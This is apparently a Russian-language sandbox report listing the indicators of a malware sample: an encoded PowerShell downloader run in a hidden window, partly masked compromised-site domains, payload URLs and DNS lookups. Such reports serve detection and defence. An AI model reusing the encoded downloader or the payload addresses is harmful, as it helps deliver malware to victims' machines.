Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADMAXwBfADAANwA9ACgAJwBFAF8AJwArACcAMgAnACsAJwAyADEAMAAnACkAOwAkAEYAXwA2AF8ANgBfADEANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABZAF8AXwAxADAAMwA1ADIAPQAoAC...
- 'th###birang.com':80
- 'th###birang.com':443
- 'tr#########.dev.trestristestigres.com':80
- 'av#####taudes.com.mx':80
- '16#.#27.119.146':80
- http://th###birang.com/wp-content/EKfmd/
- http://tr#########.dev.trestristestigres.com/wp-content/twIP/
- http://www.av#####taudes.com.mx/cgi-bin/dkhOZ5/
- http://16#.#27.119.146/wp-content/EsQk/
- 'th###birang.com':443
- DNS ASK th###birang.com
- DNS ASK tr#########.dev.trestristestigres.com
- DNS ASK da####etke.com.vn
- DNS ASK av#####taudes.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADMAXwBfADAANwA9ACgAJwBFAF8AJwArACcAMgAnACsAJwAyADEAMAAnACkAOwAkAEYAXwA2AF8ANgBfADEANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABZAF8AXwAxADAAMwA1ADIAPQAoAC...' (со скрытым окном)